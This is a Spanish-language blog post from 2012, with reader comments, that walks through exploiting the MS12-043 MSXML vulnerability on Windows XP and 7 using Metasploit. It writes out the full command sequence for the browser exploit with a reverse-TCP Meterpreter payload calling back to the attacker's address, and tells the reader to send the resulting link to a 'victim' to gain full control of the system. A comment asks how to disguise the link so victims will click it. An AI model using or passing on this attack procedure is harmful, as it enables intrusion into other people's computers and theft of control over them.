viernes, 26 de octubre de 2012

Hacking Windows 7 - XP desde Metasploit mediante Microsoft XML Core Services Vulnerability



En este entrada se describirá como explotar un Sistema Windows, ya sea XP o 7, mediante la vulnerabilidad MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption desde el Metasploit de una forma rápida y divertida como acostumbramos a hacerlo.

Esta vulnerabilidad se aprovecha de un fallo en la memoria de Microsoft XML Core Services al intentar acceder a un nodo sin inicializar con la API getDefinition, por lo que puede dañar la memoria, permitiendo la ejecución remota de código.


Plataformas de Windows afectados:

  • Microsoft Windows XP
  • Microsoft Windows Vista
  • Microsoft Windows Server 2008 R2
  • Microsoft Windows Server 2008
  • Microsoft Windows Server 2003
  • Microsoft Windows 7
  • Microsoft Windows 2000

Productos de Windows afectados:

  • Microsoft XML Core Services 6.0
  • Microsoft XML Core Services 5.0
  • Microsoft XML Core Services 4.0
  • Microsoft XML Core Services 3.0
  • Microsoft Expression Web
  • Microsoft SharePoint Server 2007
  • Microsoft Office Groove 2007
  • Microsoft Word Viewer
  • Microsoft Office Compatibility Pack
  • Microsoft Office 2007
  • Microsoft Office 2003

Para proceder a explotar esta vulnerabilidad, debemos usar y realizar lo siguiente:


REQUERIMIENTOS:

  • Backtrack 5 R1 - R2 o R3 (Atacante)
  • Metasploit Framework (Atacante)
  • Windows XP - 7 (Victima)

PROCEDIMIENTO DEL ATAQUE:

Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:

-------------------------------------------------------------------------------------------------------------
use exploit/windows/browser/msxml_get_definition_code_exec (Usar msxml code exploit)
set payload windows/meterpreter/reverse_tcp (Payload que devolvera un Meterpreter)
set lhost 192.168.1.17 (IP del Atacante) 
set srvhost 192.168.1.17 (IP del Atacante)
set uripath / (Path del link a enviar)
exploit
-------------------------------------------------------------------------------------------------------------



Dichos comandos crearan una URL, por ejemplo http://192.167.1.17:8080 la cual tenemos que enviarle al usuario (victima) para que lo ejecute desde su navegador y así recibir la conexión inversa.

Ejemplo:



Dicha imagen muestra que ya he recibido una conexión entre mi ordenador y el usuario (victima),  por lo tanto tenemos acceso total al sistema, solo quedaría generar la session para poder ejecutar comandos dentro del sistema 'owneado

Ejemplo:



Espero lo usen con fines de aprendizaje ;)

Saludos.

10 comentarios:

  1. Excelente amigo... solo que con una cuestion, miro que lo detecta el antivirus...

    ResponderEliminar
  2. Caleb muy bueno!! Esta web tiene futuro :D

    ResponderEliminar
  3. ¿Existe alguna forma de protegernos de estos ataques? Buen aporte.

    Saludos

    ResponderEliminar
  4. Oigan por que me sale este mensage
    Unknown variable
    Usage: set [option] [value]

    Set the given option to value. If value is omitted, print the current value.
    If both are omitted, print options that are currently set.

    If run from a module context, this will set the value in the module's
    datastore. Use -g to operate on the global datastore

    ResponderEliminar
  5. Hola una consulta este ataque es para tu red local o global ???

    ResponderEliminar
  6. Hola una consulta este ataque es para tu red local o global ???

    ResponderEliminar
  7. Si.. Claro.. Fines de apredizaje ¬¬ xDDD

    ResponderEliminar
  8. hola tus post son de lujos pero te falto una cosa que usario con 2 dedos de frente va apretar esa url que es una direccion ip te falto decir como poder ocultar esa direccion para poder concretar el ataque seria de mucha ayuda desde ya muchas gracias :)

    ResponderEliminar